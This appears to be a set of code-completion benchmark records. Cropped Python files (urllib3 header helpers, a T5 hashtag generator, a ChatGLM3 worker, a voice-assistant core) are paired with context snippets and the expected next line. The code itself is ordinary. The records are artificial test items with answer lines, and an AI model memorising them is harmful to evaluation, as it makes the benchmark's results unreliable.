if method.upper() not in _METHODS_NOT_EXPECTING_BODY:
content_length = 0
else:
content_length = None
# Bytes or strings become bytes
elif isinstance(body, (str, bytes)):
| from __future__ import annotations
if typing.TYPE_CHECKING:
# Pass as a value within ``headers`` to skip
# emitting some HTTP headers that are added automatically.
# The only headers that are supported are ``Accept-Encoding``,
# ``Host``, and ``User-Agent``.
SKIP_HEADER = "@@@SKIP_HEADER@@@"
SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])
ACCEPT_ENCODING = "gzip,deflate"
try:
try:
except ImportError:
except ImportError:
pass
else:
ACCEPT_ENCODING += ",br"
try:
except ImportError:
pass
else:
ACCEPT_ENCODING += ",zstd"
class _TYPE_FAILEDTELL(Enum):
token = 0
_FAILEDTELL: Final[_TYPE_FAILEDTELL] = _TYPE_FAILEDTELL.token
_TYPE_BODY_POSITION = typing.Union[int, _TYPE_FAILEDTELL]
# When sending a request with these methods we aren't expecting
# a body so don't need to set an explicit 'Content-Length: 0'
# The reason we do this in the negative instead of tracking methods
# which 'should' have a body is because unknown methods should be
# treated as if they were 'POST' which *does* expect a body.
_METHODS_NOT_EXPECTING_BODY = {"GET", "HEAD", "DELETE", "TRACE", "OPTIONS", "CONNECT"}
def make_headers(
keep_alive: bool | None = None,
accept_encoding: bool | list[str] | str | None = None,
user_agent: str | None = None,
basic_auth: str | None = None,
proxy_basic_auth: str | None = None,
disable_cache: bool | None = None,
) -> dict[str, str]:
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'. If either the ``brotli`` or
``brotlicffi`` package is installed 'gzip,deflate,br' is used instead.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example:
.. code-block:: python
import urllib3
print(urllib3.util.make_headers(keep_alive=True, user_agent="Batman/1.0"))
# {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
print(urllib3.util.make_headers(accept_encoding=True))
# {'accept-encoding': 'gzip,deflate'}
"""
headers: dict[str, str] = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ",".join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers["accept-encoding"] = accept_encoding
if user_agent:
headers["user-agent"] = user_agent
if keep_alive:
headers["connection"] = "keep-alive"
if basic_auth:
headers[
"authorization"
] = f"Basic {b64encode(basic_auth.encode('latin-1')).decode()}"
if proxy_basic_auth:
headers[
"proxy-authorization"
] = f"Basic {b64encode(proxy_basic_auth.encode('latin-1')).decode()}"
if disable_cache:
headers["cache-control"] = "no-cache"
return headers
def set_file_position(
body: typing.Any, pos: _TYPE_BODY_POSITION | None
) -> _TYPE_BODY_POSITION | None:
"""
If a position is provided, move file to that point.
Otherwise, we'll attempt to record a position for future use.
"""
if pos is not None:
rewind_body(body, pos)
elif getattr(body, "tell", None) is not None:
try:
pos = body.tell()
except OSError:
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body.
pos = _FAILEDTELL
return pos
def rewind_body(body: typing.IO[typing.AnyStr], body_pos: _TYPE_BODY_POSITION) -> None:
"""
Attempt to rewind body to a certain position.
Primarily used for request redirects and retries.
:param body:
File-like object that supports seek.
:param int pos:
Position to seek to in file.
"""
body_seek = getattr(body, "seek", None)
if body_seek is not None and isinstance(body_pos, int):
try:
body_seek(body_pos)
except OSError as e:
raise UnrewindableBodyError(
"An error occurred when rewinding request body for redirect/retry."
) from e
elif body_pos is _FAILEDTELL:
raise UnrewindableBodyError(
"Unable to record file position for rewinding "
"request body during a redirect/retry."
)
else:
raise ValueError(
f"body_pos must be of type integer, instead it was {type(body_pos)}."
)
class ChunksAndContentLength(typing.NamedTuple):
chunks: typing.Iterable[bytes] | None
content_length: int | None
def body_to_chunks(
body: typing.Any | None, method: str, blocksize: int
) -> ChunksAndContentLength:
"""Takes the HTTP request method, body, and blocksize and
transforms them into an iterable of chunks to pass to
socket.sendall() and an optional 'Content-Length' header.
    A 'Content-Length' of 'None' indicates that the length of the body
    can't be determined, so 'Transfer-Encoding: chunked' should be used
    for framing instead.
"""
chunks: typing.Iterable[bytes] | None
content_length: int | None
# No body, we need to make a recommendation on 'Content-Length'
# based on whether that request method is expected to have
# a body or not.
if body is None:
chunks = None
if method.upper() not in _METHODS_NOT_EXPECTING_BODY:
content_length = 0
else:
content_length = None
# Bytes or strings become bytes
elif isinstance(body, (str, bytes)): | chunks = (to_bytes(body),) | 1 | 2023-12-16 04:12:01+00:00 | 4k |
ict-bigdatalab/RIGHT | model.py | [
{
"identifier": "Twitter_THG",
"path": "get_datasets.py",
"snippet": "class Twitter_THG(Dataset):\n def __init__(self, tokenizer, args, mode):\n super(Twitter_THG, self).__init__()\n if mode == 'train':\n self.src_data_path = args.train_src_file\n self.dst_data_path = args.train_dst_file\n elif mode == 'val':\n self.src_data_path = args.val_src_file\n self.dst_data_path = args.val_dst_file\n elif mode == 'test':\n self.src_data_path = args.test_src_file\n self.dst_data_path = args.test_dst_file\n else:\n raise ValueError(\"please give mode in [train, val, test]\")\n\n if args.use_retrieval_augmentation:\n if mode == 'train':\n self.retrieval_index_path = args.retrieval_index_path_for_train\n elif mode == 'val':\n self.retrieval_index_path = args.retrieval_index_path_for_val\n elif mode == 'test':\n self.retrieval_index_path = args.retrieval_index_path_for_test\n self.retrieval_document_path = args.train_dst_file\n self.selector_result_path = None\n if args.use_selector_result:\n if mode == 'train':\n self.selector_result_path = args.selector_result_path_for_train\n elif mode == 'val':\n self.selector_result_path = args.selector_result_path_for_val\n elif mode == 'test':\n self.selector_result_path = args.selector_result_path_for_test\n self.tokenizer = tokenizer\n self.max_source_length = args.max_source_length\n self.max_target_length = args.max_target_length\n self.args = args\n\n self.inputs = []\n self.targets = []\n self._build_datasets()\n\n def __len__(self):\n return len(self.inputs)\n\n def __getitem__(self, index):\n source_ids = self.inputs[index][\"input_ids\"].squeeze()\n target_ids = self.targets[index][\"input_ids\"].squeeze()\n\n src_mask = self.inputs[index][\"attention_mask\"].squeeze() # might need to squeeze\n target_mask = self.targets[index][\"attention_mask\"].squeeze() # might need to squeeze\n\n return {\"source_ids\": source_ids, \"source_mask\": src_mask,\n \"target_ids\": target_ids, \"target_mask\": target_mask,\n \"src\": self.src[index], \"target\": self.tar_seq[index]}\n\n def _build_datasets(self):\n src, targets, hashtags = get_transformed_io(self.src_data_path, self.dst_data_path)\n if self.args.use_retrieval_augmentation:\n src = retrieval_augment(self.args, src, self.retrieval_index_path, self.retrieval_document_path, self.selector_result_path, top_k=5)\n self.src = src\n self.tar_seq = targets\n # vision_dataLen_distribution(src, self.tokenizer, \"input text distribution\")\n # vision_dataLen_distribution(targets, self.tokenizer, \"output text distribution\")\n for i in range(len(src)):\n input = src[i]\n tokenized_input = self.tokenizer(\n [input], max_length=self.max_source_length, padding=\"max_length\",\n truncation=True, return_tensors=\"pt\"\n )\n self.inputs.append(tokenized_input)\n\n target = targets[i]\n tokenized_target = self.tokenizer(\n [target], max_length=self.max_target_length, padding=\"max_length\",\n truncation=True, return_tensors=\"pt\"\n )\n self.targets.append(tokenized_target)"
},
{
"identifier": "extracte_hashtags_from_sequence",
"path": "eval_utils.py",
"snippet": "def extracte_hashtags_from_sequence(seq: str):\n seq = seq.strip()\n if seq == 'None':\n seq = ''\n hashtags = seq.split(SEP)\n hashtags = [ht.strip() for ht in hashtags]\n results = []\n for ht in hashtags:\n if ht != '' and ht not in results:\n results.append(ht)\n return results"
}
] | import torch
import torch.nn as nn
import argparse
from transformers import T5ForConditionalGeneration, T5Tokenizer, T5Config, AutoModelForSeq2SeqLM, MT5ForConditionalGeneration
from get_datasets import Twitter_THG
from torch.utils.data import DataLoader
from Template import SEP, MAP_SPETOKENS_IDS
from eval_utils import extracte_hashtags_from_sequence | 1,961 |
class GenerativeModel(nn.Module):
def __init__(self, args, tokenizer):
super().__init__()
self.args = args
self.tokenizer = tokenizer
if args.dataset == 'THG':
if args.load_pretrained_parameters:
self.model = T5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
else:
config = T5Config.from_pretrained(self.args.model_name_or_path)
self.model = AutoModelForSeq2SeqLM.from_config(config)
print(f"\nthe model is {self.args.model_name_or_path} from scratch")
elif args.dataset == 'WHG':
self.model = MT5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
def forward(self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, labels):
outputs = self.model(input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
labels=labels)
return outputs
def generate(self, batch, num_beams=1):
self.eval()
if self.args.dataset == 'WHG':
with torch.no_grad():
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
num_return_sequences=num_beams
)
decs = [self.tokenizer.decode(ids, skip_special_tokens=True) for ids in outputs]
dec = []
batch_size = len(batch['src'])
for bs in range(batch_size):
hashtag_str = ''
for d in range(bs * num_beams, (bs+1) * num_beams, 1):
hashtag_str = hashtag_str + decs[d] + ' ' + SEP + ' '
hashtag_str = hashtag_str[:(len(SEP) + 2) * (-1)].strip()
dec.append(hashtag_str)
else:
with torch.no_grad():
# if num_beams == 1:
# self.model._cache_input_ids = batch['source_ids'].to(self.args.device)
# else:
# expanded_return_idx = (
# torch.arange(batch['source_ids'].shape[0]).view(-1, 1).repeat(1, num_beams).view(-1).to(
# self.to(self.args.device))
# )
# input_ids = batch['source_ids'].index_select(0, expanded_return_idx)
# self.model._cache_input_ids = input_ids.to(self.args.device)
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
)
# decode outputs
sequences = outputs
dec = [self.tokenizer.decode(ids, skip_special_tokens=False, clean_up_tokenization_spaces=False) for ids in
sequences]
for d in range(len(dec)):
dec[d] = dec[d].replace('<pad>', '')
dec[d] = dec[d].replace('</s>', '').strip()
result = extracte_hashtags_from_sequence(dec[d])
dec[d] = ""
if len(result) == 0:
dec[d] = "None"
else:
for res in result:
dec[d] = dec[d] + res + " " + SEP + " "
dec[d] = dec[d][:(len(SEP) + 2) * (-1)].strip()
self.train()
# the shape is [batch_size, seq_len]
return dec
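# Hedged illustration (added for clarity, not from the original repo): generate()
# joins the parsed hashtags back into a single string separated by the SEP token and
# trims the trailing separator. The same join/trim logic, sketched standalone; the
# literal "[SEP]" below is only an assumed stand-in for the real SEP from Template.
def _sketch_join_hashtags(hashtags, sep="[SEP]"):
    joined = ""
    for tag in hashtags:
        joined = joined + tag + " " + sep + " "
    return joined[:(len(sep) + 2) * (-1)].strip()
# e.g. _sketch_join_hashtags(["tag_a", "tag_b"]) -> "tag_a [SEP] tag_b"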
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", default="./PLM_checkpoint/t5-base", type=str)
parser.add_argument("--device", default='cpu', type=str,)
parser.add_argument("--max_target_length", default=100, type=int)
args = parser.parse_args()
tokenizer = T5Tokenizer.from_pretrained('PLM_checkpoint/t5-base')
model = GenerativeModel(args, tokenizer)
src_path = 'data/THG_twitter/twitter.2021.valid.src'
dst_path = 'data/THG_twitter/twitter.2021.valid.dst'
|
dst_path = 'data/THG_twitter/twitter.2021.valid.dst' | datasets = Twitter_THG(tokenizer, src_path, dst_path) | 0 | 2023-12-16 06:00:53+00:00 | 4k |
shell-nlp/gpt_server | gpt_server/model_worker/chatglm3.py | [
{
"identifier": "conv2messages",
"path": "gpt_server/model_handler/chatglm3.py",
"snippet": "def conv2messages(prompt):\n # 去除多余的换行符和空格\n prompt = prompt.strip()\n\n # 将提示模型转换为列表格式\n messages = []\n segments = prompt.split(\"<|\")\n for segment in segments[1:]:\n role, content = segment.split(\"|>\")\n messages.append({\"role\": role, \"content\": content.strip()})\n query = None\n for i, item in enumerate(messages):\n if item[\"role\"] == \"assistant\" and item[\"content\"] == \"\":\n query = messages[i - 1][\"content\"]\n messages = messages[: i - 1]\n break\n\n if query:\n return query, messages\n else:\n raise Exception(\"conv2messages 解析错误\")"
},
{
"identifier": "ModelWorkerBase",
"path": "gpt_server/model_worker/base.py",
"snippet": "class ModelWorkerBase(BaseModelWorker, ABC):\n def __init__(\n self,\n controller_addr: str,\n worker_addr: str,\n worker_id: str,\n model_path: str,\n model_names: List[str],\n limit_worker_concurrency: int,\n conv_template: str = None, # type: ignore\n model_type: str = \"AutoModel\",\n ):\n super().__init__(\n controller_addr,\n worker_addr,\n worker_id,\n model_path,\n model_names,\n limit_worker_concurrency,\n conv_template,\n )\n os.environ[\"WORKER_NAME\"] = self.__class__.__name__\n self.use_deepspeed = os.getenv(\"USE_DS\", 0)\n self.use_accelerate = os.getenv(\"USE_ACC\", 0)\n self.model_type = model_type\n self.model = None\n self.tokenizer = None\n self.load_model_tokenizer(model_path)\n self.context_len = self.get_context_length()\n logger.info(f\"Loading the model {self.model_names} on worker {worker_id} ...\")\n self.init_heart_beat()\n\n def get_context_length(\n self,\n ):\n \"\"\" \"支持的最大 token 长度\"\"\"\n if self.model is None:\n return 512\n return get_context_length(self.model.config)\n\n def get_model_class(self):\n MODEL_CLASS = AutoModel\n if self.model_type == \"LlamaForCausalLM\":\n MODEL_CLASS = LlamaForCausalLM\n register = AutoModelForCausalLM._model_mapping.register\n register(LlamaForCausalLM.config_class, LlamaForCausalLM, exist_ok=True)\n MODEL_CLASS = AutoModelForCausalLM\n\n elif self.model_type == \"AutoModel\":\n MODEL_CLASS = AutoModel\n elif self.model_type == \"AutoModelForCausalLM\":\n MODEL_CLASS = AutoModelForCausalLM\n\n return MODEL_CLASS\n\n @abstractmethod\n def load_model_tokenizer(self, model_path):\n \"\"\"加载 模型 和 分词器 直接对 self.model 和 self.tokenizer 进行赋值\"\"\"\n self.tokenizer = AutoTokenizer.from_pretrained(\n model_path,\n trust_remote_code=True,\n encode_special_tokens=True,\n )\n\n if self.use_accelerate and self.use_deepspeed:\n assert 0, \"ds 和 acc 不能同时设置为 True\"\n\n MODEL_CLASS = self.get_model_class()\n if not self.use_deepspeed and not self.use_accelerate:\n logger.info(\"使用hf\")\n self.model = MODEL_CLASS.from_pretrained(\n model_path,\n trust_remote_code=True,\n torch_dtype=torch.bfloat16,\n device_map=None if self.use_deepspeed else \"auto\",\n ).half()\n\n self.model = self.model.eval()\n\n if self.use_deepspeed:\n from gpt_server.model_backend.deepspeed_backend import get_ds_model\n\n logger.info(\"使用deepspeed\")\n ds_model = get_ds_model(model_path=model_path, model_class=MODEL_CLASS)\n self.model = ds_model\n if self.use_accelerate:\n from gpt_server.model_backend.accelerate_backend import get_acc_model\n\n logger.info(\"使用accelerate\")\n acc_model = get_acc_model(model_path=model_path, model_class=MODEL_CLASS)\n self.model = acc_model\n\n @abstractmethod\n def generate_stream_gate(self, params):\n pass\n\n def generate_gate(self, params):\n for x in self.generate_stream_gate(params):\n pass\n return json.loads(x[:-1].decode())\n\n @abstractmethod\n def get_embeddings(self, params):\n pass\n\n @classmethod\n def get_worker(\n cls,\n model_path: str,\n controller_addr: str = \"http://localhost:21001\",\n worker_addr: str = \"http://localhost:21002\",\n worker_id: str = str(uuid.uuid4())[:8],\n model_names: List[str] = [\"chatglm3-6b-2\"],\n limit_worker_concurrency: int = 6,\n conv_template: str = None, # type: ignore\n ):\n worker = cls(\n controller_addr,\n worker_addr,\n worker_id,\n model_path,\n model_names,\n limit_worker_concurrency,\n conv_template=conv_template,\n )\n return worker\n\n @classmethod\n def run(cls):\n import uvicorn\n import argparse\n\n parser = argparse.ArgumentParser()\n 
parser.add_argument(\"--gpus\", type=str, default=\"gpus\")\n\n parser.add_argument(\"--local_rank\", type=str, default=\"local-rank\") # 必传\n parser.add_argument(\"--master_port\", type=str, default=\"master_port\")\n parser.add_argument(\n \"--model_name_or_path\", type=str, default=\"model_name_or_path\"\n )\n parser.add_argument(\n \"--model_names\", type=lambda s: s.split(\",\"), default=\"model_names\"\n )\n\n args = parser.parse_args()\n use_deepspeed = os.getenv(\"USE_DS\", 0)\n if use_deepspeed:\n print(\"local-rank\", args.local_rank)\n print(\"master_port\", args.master_port)\n os.environ[\"Local_RANK\"] = args.local_rank\n os.environ[\"MASTER_PORT\"] = args.master_port\n # DS 只能在内部生效\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n\n host = \"localhost\"\n port = get_free_tcp_port()\n worker_addr = f\"http://{host}:{port}\"\n worker = cls.get_worker(\n worker_addr=worker_addr,\n model_path=args.model_name_or_path,\n model_names=args.model_names,\n conv_template=\"chatglm3\", # TODO 默认是chatglm3用于统一处理\n )\n if args.local_rank == \"0\":\n print(\"=======================================\")\n print(f\"{args.model_names[0]} 启动成功!\")\n print(\"=======================================\")\n uvicorn.run(app, host=host, port=port)"
}
] | import json
import torch
from typing import List
from fastchat.constants import ErrorCode, SERVER_ERROR_MSG
from transformers.generation.logits_process import LogitsProcessor
from gpt_server.model_handler.chatglm3 import conv2messages
from gpt_server.model_worker.base import ModelWorkerBase | 1,835 |
class InvalidScoreLogitsProcessor(LogitsProcessor):
def __call__(
self, input_ids: torch.LongTensor, scores: torch.FloatTensor
) -> torch.FloatTensor:
if torch.isnan(scores).any() or torch.isinf(scores).any():
scores.zero_()
scores[..., 5] = 5e4
return scores
invalid_score_processor = InvalidScoreLogitsProcessor()
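# Hedged illustration (added for clarity, not part of the original worker): when a
# logits row contains NaN or inf, the processor above zeroes the whole row and puts
# a large score on token id 5, effectively forcing that token. A minimal check:
def _sketch_invalid_score_fix():
    scores = torch.tensor([[float("nan"), 0.0, 1.0, 2.0, 3.0, 4.0]])
    fixed = invalid_score_processor(torch.tensor([[0]]), scores)
    # fixed is now [[0., 0., 0., 0., 0., 50000.]]
    return fixed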
|
| class ChatGLM3Worker(ModelWorkerBase): | 1 | 2023-12-16 07:43:28+00:00 | 4k |
ilyamiro/Stewart | Core/Core.py | [
{
"identifier": "Synthesizer",
"path": "Audio/synthesizer.py",
"snippet": "class Synthesizer:\n \"\"\"\n Class for synthesizing Stewart voice\n Based on silero-tts v4 model from https://github.com/snakers4/silero-models\n \"\"\"\n\n def __init__(self, speaker=\"eugene\"):\n \"\"\"\n Synthesizer initializing\n :param speaker: One of eugene; kseniya; baya; xenia; aidar; random;\n \"\"\"\n # initialize pygame for playing audio\n self.audio_init()\n\n # initialize sample rate and the speaker_voice\n\n self.sample_rate = 48000\n self.speaker = speaker\n\n # initialization for torch package\n self.device = torch.device(\"cpu\")\n torch.set_num_threads(32)\n\n # downloading model from source\n self.local_file = \"model.pt\"\n self.download_model()\n\n # creating model\n self.model = torch.package.PackageImporter(\n f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/model.pt\").load_pickle(\"tts_models\",\n \"model\")\n self.model.to(self.device)\n synthesis_logger.info(\"Model has beed set\")\n\n # setting audio state checker for synthesizer\n self.audio = PlayChecker()\n\n self.music_playing = False\n self.music_stopped = True\n\n def download_model(self, url=\"https://models.silero.ai/models/tts/ru/v4_ru.pt\"):\n \"\"\"\n Function for downloading voice model\n :param url: address for downloading voice model\n \"\"\"\n # downloading model from source\n if not os.path.isfile(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/model.pt\"):\n synthesis_logger.info(\"Downloading synthesis model\")\n torch.hub.download_url_to_file(url, self.local_file)\n\n @staticmethod\n def audio_init():\n \"\"\"\n Function for initializing pygame audio player\n\n \"\"\"\n pygame.init()\n pygame.mixer.init()\n synthesis_logger.debug(\"Audio initialized\")\n\n def say(self, text: str) -> None:\n \"\"\"\n Function for saying something\n :param text: text for saying\n :return: None\n \"\"\"\n self.synthesize(text)\n # playing audio from file using pygame.\n # playsound() could be used instead, but it doesn't really imply stop() func, while pygame does\n try:\n pygame.mixer.music.load(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/audio.wav\")\n pygame.mixer.music.play()\n except pygame.error:\n synthesis_logger.error(\"Audio playing error\")\n\n def synthesize(self, text: str) -> None:\n if self.music_stopped:\n # synthesizing voice\n try:\n self.model.save_wav(ssml_text=f\"<speak><prosody rate='100%'>{text}</prosody></speak>\",\n speaker=self.speaker,\n\n sample_rate=self.sample_rate,\n audio_path=f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/audio.wav\") # ssml text supports a lot of parameters, such as intonation, pauses etc.\n except AssertionError:\n raise SpeakerInvalid\n except Exception:\n raise SynthesisError\n\n @staticmethod\n def is_saying() -> bool:\n \"\"\"\n Function for checking if synthesized audio is being played\n :return: checks if stewart is saying something. Returns True if yes, else False\n \"\"\"\n return pygame.mixer.music.get_busy()\n\n def change_speaker(self, speaker: str):\n \"\"\"\n Function for changing voice model's speaker\n :param speaker: speaker name. One of eugene; kseniya; baya; xenia; aidar; random;\n \"\"\"\n self.speaker = speaker\n\n def change_sample_rate(self, rate: int):\n \"\"\"\n Function for changing voice model's rate\n :param rate: rate of a synthesizer model\n\n \"\"\"\n self.sample_rate = rate"
},
{
"identifier": "Voice",
"path": "Audio/recognition.py",
"snippet": "class Voice:\n \"\"\"\n Class for recognizing user's voice\n All models taken from: https://alphacephei.com/vosk/models\n\n Usage example\n\n voice = Voice()\n voice.start_stream()\n while True:\n for word in voice.listen():\n print(word)\n\n \"\"\"\n\n def __init__(self, lang=\"ru\", big_model=False):\n # if platform == \"linux\" or platform == \"linux2\":\n # # on some linux systems, jack_control is disabled on boot, and audio input is not working properly\n # # if there is another audio input driver controller, it should be enabled itself\n # os.system(\"jack_control start\")\n self.rate = 16000\n self.init_model(lang, big_model)\n self.init_audio(16000)\n self.init_recognizer()\n\n def listen(self):\n \"\"\"\n Generator for handling user input.\n Reads data from stream and uses recognizer to analyze the data\n\n \"\"\"\n data = self.stream.read(4000, exception_on_overflow=False)\n # checking if data is valid\n if self.recognizer.AcceptWaveform(data) and len(data) > 1 and self.stream.is_active():\n # using json to load results of user input's analyzing\n answer = json.loads(self.recognizer.Result())\n # if user said something - it yields\n if answer['text']:\n # recognition_logger.info(\"Data readed and analyzed\")\n yield answer['text']\n\n def init_model(self, model_lang=\"ru\", big_model: bool = False):\n \"\"\"\n :param model_lang: choose model's language: ru/en\n :param big_model: choose if the model is going to be big or not. ->\n\n Big models can take up to 8 Gb of RAM on your device, so using them might not be optimal for you\n Small models are mainly used for Android/IOS apps, they are much easier to handle,\n but they are worse at voice detection.\n\n \"\"\"\n # default model path\n model_path = f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Speech-models/vosk-model-small-ru-0.22\"\n\n # choosing model depending on user's choice\n if model_lang == \"ru\":\n model_path = f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Speech-models/vosk-model{'-small' if not big_model else ''}-ru-{'0.42' if big_model else '0.22'}\"\n elif model_lang == \"en\":\n model_path = f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Speech-models/vosk-model{'-small' if not big_model else ''}-en-us-{'0.22' if big_model else '0.15'}\"\n # initializing the model\n\n self.model = Model(model_path)\n recognition_logger.info(\"Model initialized\")\n\n def init_audio(self, rate):\n \"\"\"\n Function for initializing pyaudio stream\n :param rate: the quality of audio coming from your microphone into the system.\n rate from 16000 to 48000 doesn't really change model's behavior\n \"\"\"\n\n p = pyaudio.PyAudio()\n self.rate = rate\n\n try:\n # the number of frames per buffer should preferably be half the rate value\n self.stream = p.open(format=pyaudio.paInt16, rate=rate, channels=1, frames_per_buffer=int(rate / 2), input=True)\n recognition_logger.info(\"stream created\")\n except TypeError:\n raise StreamParametersError(\"Stream parameters (rate) are corrupted. 
Failed to open stream\")\n\n def init_recognizer(self):\n \"\"\"\n Function for initializing recognizer\n \"\"\"\n try:\n self.recognizer = KaldiRecognizer(self.model, self.rate)\n recognition_logger.info(\"Recognizer initialized\")\n except AttributeError:\n recognition_logger.error(\"Model error\")\n raise ModelError(\"There was an error initializing this model\")\n\n\n def start_stream(self):\n \"\"\"\n Start voice input\n \"\"\"\n self.stream.start_stream()\n recognition_logger.info(\"stream started\")\n\n def stop_stream(self):\n \"\"\"\n Stop voice input\n \"\"\"\n self.stream.stop_stream()\n recognition_logger.info(\"stream stopped\")\n\n\n def is_enabled(self):\n \"\"\"\n Function for checking if the voice input is active\n \"\"\"\n return self.stream.is_active()"
},
{
"identifier": "Data",
"path": "Database/Data.py",
"snippet": "class Data:\n \"\"\"\n class for data handling\n \"\"\"\n def __init__(self):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/data.json\", \"r\") as file:\n data = json.load(file)\n for key in data.keys():\n self.__setattr__(key, data[key])"
},
{
"identifier": "PluginOperation",
"path": "PluginSystem/Plugin_system.py",
"snippet": "class PluginOperation:\n @staticmethod\n def register_plugin(plugin: Plugin):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n __info__ = asdict(plugin.info)\n if __info__ not in data[\"plugins\"] and os.path.exists(\n f'{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/{__info__[\"path\"]}'):\n data[\"plugins\"].append(__info__)\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"w\") as file:\n json.dump(data, file, ensure_ascii=False)\n plugin_system_logger.info(f\"Plugin {__info__['name']} has been registered\")\n else:\n plugin_system_logger.info(f\"Plugin {__info__['name']} is already registered\")\n\n @staticmethod\n def __check_plugin__(name: str, check: str):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n for plugin in data[\"plugins\"]:\n if plugin[\"name\"] == name:\n prm = plugin[check]\n plugin_system_logger.info(f\"Plugin's named {name} parameter {check} is equal to {prm}\")\n return prm\n\n @staticmethod\n def unregister_plugin(name: str):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n for plugin in data[\"plugins\"]:\n if plugin[\"name\"] == name:\n data[\"plugins\"].remove(plugin)\n break\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"w\") as file:\n json.dump(data, file, ensure_ascii=False)\n plugin_system_logger.debug(f\"Plugin {name} was successfully unregistered\")\n\n @staticmethod\n def __plugin_load__(name):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n plugin_info = None\n for go in data[\"plugins\"]:\n if go[\"name\"] == name:\n plugin_info = go\n plugin_system_logger.info(f\"Plugin {plugin_info['name']} is going to be loaded to the core\")\n break\n if plugin_info:\n spec = importlib.util.spec_from_file_location(\"main\",\n f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/{plugin_info['path']}/main.py\")\n plugin_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(plugin_module)\n return plugin_module.Main\n else:\n plugin_system_logger.error(\"Plugin not found\")"
},
{
"identifier": "PluginInfo",
"path": "PluginSystem/Plugin_system.py",
"snippet": "class PluginInfo:\n name: str\n author: str\n type: str\n path: str\n platform: str\n about: str"
},
{
"identifier": "core_logger",
"path": "LogSystem/Loggers.py",
"snippet": "class BaseLogger(Logger):\n def __init__(self, name, level=logging.NOTSET, ):\n def _setup_logger(self):"
}
] | import json
import os
import random
import threading
import pyautogui
import importlib.util
from Audio.synthesizer import Synthesizer
from Audio.recognition import Voice
from Database.Data import Data
from PluginSystem.Plugin_system import PluginOperation, PluginInfo
from Command_System import *
from LogSystem import core_logger | 3,011 |
pyautogui.FAILSAFE = False
class Core:
def __init__(self):
|
def __init__(self): | core_logger.debug("Core execution started") | 5 | 2023-12-16 12:24:15+00:00 | 4k |
djkcyl/ABot-NT | utils/text2image.py | [
{
"identifier": "AdvertisementCategory",
"path": "models/ad.py",
"snippet": "class AdvertisementCategory(str, Enum):\n business = \"商业\"\n public_welfare = \"公益\"\n announcement = \"公告\"\n tips = \"提示\""
},
{
"identifier": "AiohttpClientService",
"path": "services/aiohttp.py",
"snippet": "class AiohttpClientService(Service):\n id = \"http.client/aiohttp\"\n session: ClientSession\n\n def __init__(self, session: ClientSession | None = None) -> None:\n self.session = cast(ClientSession, session)\n super().__init__()\n\n @property\n def stages(self) -> set[str]:\n return {\"preparing\", \"cleanup\"}\n\n @property\n def required(self) -> set:\n return set()\n\n async def launch(self, _: Launart) -> None:\n async with self.stage(\"preparing\"):\n if self.session is None:\n self.session = ClientSession(timeout=ClientTimeout(total=None))\n async with self.stage(\"cleanup\"):\n await self.session.close()"
},
{
"identifier": "S3FileService",
"path": "services/s3file.py",
